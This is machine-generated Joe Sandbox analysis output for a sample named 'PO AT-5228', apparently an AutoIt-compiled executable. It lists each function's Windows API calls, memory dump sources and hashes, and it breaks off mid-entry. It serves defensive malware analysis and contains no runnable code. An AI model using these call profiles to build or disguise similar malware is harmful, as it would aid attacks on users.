                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction ID: 7040dacb7870cfba3b4d7fa9deac4f1bec5bc77212e0008066222bbad6cc025f
                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction Fuzzy Hash: A1014B3204054EBBCF275E94DC51CEE3FA2FB18354B5984A5FE1859135D336CAB2AB81
                                                                                        APIs
                                                                                          • Part of subcall function 00B87A0D: __getptd_noexit.LIBCMT ref: 00B87A0E
                                                                                        • __lock.LIBCMT ref: 00B8748F
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00B874AC
                                                                                        • _free.LIBCMT ref: 00B874BF
                                                                                        • InterlockedIncrement.KERNEL32(01932990), ref: 00B874D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                        • String ID:
                                                                                        • API String ID: 2704283638-0
                                                                                        • Opcode ID: 05840ec933c1804e56ac52fb4e1a9729509e7304acee6a3240ec41e5d2f7351c
                                                                                        • Instruction ID: effb8123f6923aa4d102eb4e8118069218fa856e99f744d378eab56b45f69034
                                                                                        • Opcode Fuzzy Hash: 05840ec933c1804e56ac52fb4e1a9729509e7304acee6a3240ec41e5d2f7351c
                                                                                        • Instruction Fuzzy Hash: F7015B32A8A6219BD712BF64944979DBBE0BF05729F288085F824677B0CF34D941CFD6
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00B87AD8
                                                                                          • Part of subcall function 00B87CF4: __mtinitlocknum.LIBCMT ref: 00B87D06
                                                                                          • Part of subcall function 00B87CF4: EnterCriticalSection.KERNEL32(00000000,?,00B87ADD,0000000D), ref: 00B87D1F
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00B87AE5
                                                                                        • __lock.LIBCMT ref: 00B87AF9
                                                                                        • ___addlocaleref.LIBCMT ref: 00B87B17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1687444384-0
                                                                                        • Opcode ID: 2c9305c033eb7cb5fadb6ec3176087be63917f1ad912698178e008208deb1ee7
                                                                                        • Instruction ID: 9f20b1c94d89d781968bf15b2f46de333242ee6072fba21794a3900796bd9adb
                                                                                        • Opcode Fuzzy Hash: 2c9305c033eb7cb5fadb6ec3176087be63917f1ad912698178e008208deb1ee7
                                                                                        • Instruction Fuzzy Hash: C3016D71445B00DFD721EF75D90674AB7F0EF40325F20898EA49A972B0CFB0A680CB55
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BCE33D
                                                                                        • _memset.LIBCMT ref: 00BCE34C
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C23D00,00C23D44), ref: 00BCE37B
                                                                                        • CloseHandle.KERNEL32 ref: 00BCE38D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3277943733-0
                                                                                        • Opcode ID: 35edc9b569fd0af8d43ab67bebca656e052b22080e3cb9375335cb4e368ecb62
                                                                                        • Instruction ID: d8157af3c08d6dd9344dbbea2b7fcd31dc1a9c8fe81d3fa290bc8f37d51cbf42
                                                                                        • Opcode Fuzzy Hash: 35edc9b569fd0af8d43ab67bebca656e052b22080e3cb9375335cb4e368ecb62
                                                                                        • Instruction Fuzzy Hash: B5F089F1670394BEE7102760AC45F7B7E9CD704754F004421FF04DA5A2DBB99D0187A8
                                                                                        APIs
                                                                                          • Part of subcall function 00B7AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
                                                                                          • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7AFF2
                                                                                          • Part of subcall function 00B7AF83: BeginPath.GDI32(?), ref: 00B7B009
                                                                                          • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7B033
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BCEA8E
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00BCEA9B
                                                                                        • EndPath.GDI32(00000000), ref: 00BCEAAB
                                                                                        • StrokePath.GDI32(00000000), ref: 00BCEAB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 1539411459-0
                                                                                        • Opcode ID: 6da45febda1f199124bc984536af692dc6a39d448e5d8fbe3d53da88f07e10bf
                                                                                        • Instruction ID: 4af87b1aa0371b2c5c38fb714b32a6c78d523d9e519292f01c83623afc7d5b38
                                                                                        • Opcode Fuzzy Hash: 6da45febda1f199124bc984536af692dc6a39d448e5d8fbe3d53da88f07e10bf
                                                                                        • Instruction Fuzzy Hash: 20F08231005299BBDB229F94AC0DFCE3F59AF1A321F084145FE116A0E2CBB59552DB95
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B9C84A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9C85D
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B9C864
                                                                                        • AttachThreadInput.USER32(00000000), ref: 00B9C86B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: 883c2dadc5bf0fe347218d4bf9da9dbc79f3ddb822556142f57e682f154137e4
                                                                                        • Instruction ID: 551dc96e829080855f2f9efcd3313ef113d03f62367cd87db68a486f472550de
                                                                                        • Opcode Fuzzy Hash: 883c2dadc5bf0fe347218d4bf9da9dbc79f3ddb822556142f57e682f154137e4
                                                                                        • Instruction Fuzzy Hash: 4FE065711412A47BDF101F61DC8DEDB7F5CEF067A1F008061B60D99460DAB1C981C7E0
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 00B9B0D6
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B9AC9D), ref: 00B9B0DD
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B9AC9D), ref: 00B9B0EA
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B9AC9D), ref: 00B9B0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: 9202beab85d50fdb36779cf9f1778430806a2b372214c9adcfd87ab5a8b362dd
                                                                                        • Instruction ID: a9dc10fa2ef6bfefb8d81dd9c5a0138c3c22bb578a13c92e1df9bd74e71015f7
                                                                                        • Opcode Fuzzy Hash: 9202beab85d50fdb36779cf9f1778430806a2b372214c9adcfd87ab5a8b362dd
                                                                                        • Instruction Fuzzy Hash: E9E086326012119BDB201FB16D4CF473BE8EF55792F118868F241DF040DFB48401C761
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00B7B496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00B7B4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00B7B4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 00B7B4BD
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00BDDE2B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BDDE38
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00BDDE51
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00BDDE6A
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00BDDE8A
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00BDDE95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 09305545c95a75c72d28613aa916ade70fbb39f4383eba912f25f1ccec364c6d
                                                                                        • Instruction ID: da33c9c901288a193cd812fcb45b2560785a7f715a9ad88422f1288730cd5c0d
                                                                                        • Opcode Fuzzy Hash: 09305545c95a75c72d28613aa916ade70fbb39f4383eba912f25f1ccec364c6d
                                                                                        • Instruction Fuzzy Hash: 77E0ED31100280AFDF215F64AC49BD87B51EB51335F14C66AF6BA6D0E1DBB24981DB12
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 466cf7cbd9bc95998541e49fcf4cb38b4a84a51c566c3b7b1a01807f27ae9398
                                                                                        • Instruction ID: 7e1ad7f99641c54380d69534f452a2317db8a15ff3cabfec1af264dd8cdf4926
                                                                                        • Opcode Fuzzy Hash: 466cf7cbd9bc95998541e49fcf4cb38b4a84a51c566c3b7b1a01807f27ae9398
                                                                                        • Instruction Fuzzy Hash: 96E012B1100244EFEB015F708888A2EBBE8EF4C350F12C80AF96E8B211DEB598408B40
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B9B2DF
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00B9B2EB
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B9B2F4
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B9B2FC
                                                                                          • Part of subcall function 00B9AB24: GetProcessHeap.KERNEL32(00000000,?,00B9A848), ref: 00B9AB2B
                                                                                          • Part of subcall function 00B9AB24: HeapFree.KERNEL32(00000000), ref: 00B9AB32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: ef637cf2720e7596642d98e928a62df7570db7d1c9a8853a3adb758226a224cc
                                                                                        • Instruction ID: d51ec79f4e02a477cadcd3c8ea366765de745e356e6fd0cb9248f2ef410363a4
                                                                                        • Opcode Fuzzy Hash: ef637cf2720e7596642d98e928a62df7570db7d1c9a8853a3adb758226a224cc
                                                                                        • Instruction Fuzzy Hash: F2E0B63A104045BBCB012BA5EC48859FBA6FF983213108621F62686575CF73A871EB95
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 5f2d3f0ab009080d38d353711f0013d312a7106d19fed5da5b71c17d43ba3a25
                                                                                        • Instruction ID: 98d99b7bf2f557692f414d7a193e9b1e736bb141fd57699ab18fa388b8ec549d
                                                                                        • Opcode Fuzzy Hash: 5f2d3f0ab009080d38d353711f0013d312a7106d19fed5da5b71c17d43ba3a25
                                                                                        • Instruction Fuzzy Hash: A2E046B1500240EFDB015F70C88862D7BE8EF4C390F11C809F96E8B211CFBA99008B00
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00B9DEAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container
                                                                                        • API String ID: 3565006973-3941886329
                                                                                        • Opcode ID: a1ee14e9e53525623f568cb1d52fb88b3f4edfda71439fa75c24bf5c261ac62d
                                                                                        • Instruction ID: d00a6a9a3c28a92c893123ed67a245a67db4f3b0f742bdc14cf77d31e2052d97
                                                                                        • Opcode Fuzzy Hash: a1ee14e9e53525623f568cb1d52fb88b3f4edfda71439fa75c24bf5c261ac62d
                                                                                        • Instruction Fuzzy Hash: 81913574600601AFDF14DF65C885B6ABBF9FF49710B2084ADF94ACB691DBB0E841CB60
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00B7BCDA
                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00B7BCF3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: 17d8bd06c5403b0a859f4f6cac030867cd67b6b45e32acb699327570b0b207f4
                                                                                        • Instruction ID: 5a08409f7f92257b3cfc5c7400361b022bb4203f8233389bcdebf066f3d496c8
                                                                                        • Opcode Fuzzy Hash: 17d8bd06c5403b0a859f4f6cac030867cd67b6b45e32acb699327570b0b207f4
                                                                                        • Instruction Fuzzy Hash: D35127714087449BE320AF24DC86BAFBBE8FF95354F41889EF6D8410A6DF7085A88756
                                                                                        APIs
                                                                                          • Part of subcall function 00B644ED: __fread_nolock.LIBCMT ref: 00B6450B
                                                                                        • _wcscmp.LIBCMT ref: 00BAC65D
                                                                                        • _wcscmp.LIBCMT ref: 00BAC670
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: 12ee9859d27ef24c76321e2741ce37795cb5cf345db26b3d7d6fa5379649693d
                                                                                        • Instruction ID: 7ba15900f76a225c7bdc9b35868065f1694869d18b2dc71da8e20a6ac3d04883
                                                                                        • Opcode Fuzzy Hash: 12ee9859d27ef24c76321e2741ce37795cb5cf345db26b3d7d6fa5379649693d
                                                                                        • Instruction Fuzzy Hash: F841A772A0420A7BDF11EAA4DC42FEF7BF9EF4A714F0004A9F515A7181DB759A04C751
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BCA85A
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BCA86F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 826f1b0f3b7c8c7211fc5996639398892771fb24738321a02e69d2bcf8570af0
                                                                                        • Instruction ID: c3d8b2546cb517dc6af670bb23bd43466a086a64d8f9139de9ed45a35ec95ce9
                                                                                        • Opcode Fuzzy Hash: 826f1b0f3b7c8c7211fc5996639398892771fb24738321a02e69d2bcf8570af0
                                                                                        • Instruction Fuzzy Hash: 7E41E574E012099FDB14CF68D881FDABBF9FB08304F1441AAE905AB781D770A942CFA1
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BB5190
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00BB51C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        • Opcode ID: c69af94872f089bbee77cf2062ef355ae2b3114621647bb8414225e351287d65
                                                                                        • Instruction ID: b0b72e062d2f6d421c67c9fb5557d7ed4b9aafaefda0b696c484f2fe1c1d0c3a
                                                                                        • Opcode Fuzzy Hash: c69af94872f089bbee77cf2062ef355ae2b3114621647bb8414225e351287d65
                                                                                        • Instruction Fuzzy Hash: 5A313B71C01119ABCF11EFA4CC85AEEBFB9FF14740F004095F815A6166DB75A946CBA0
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00BC980E
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BC984A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: a67bec1370ecf4aa981dc6ca88e8d94a22a380f260fe5df8234d86d0af66ebbc
                                                                                        • Instruction ID: f4a7d9d4213ef8265b51b307fb722376dc4b546b1d7b38ce2a38646a757d393f
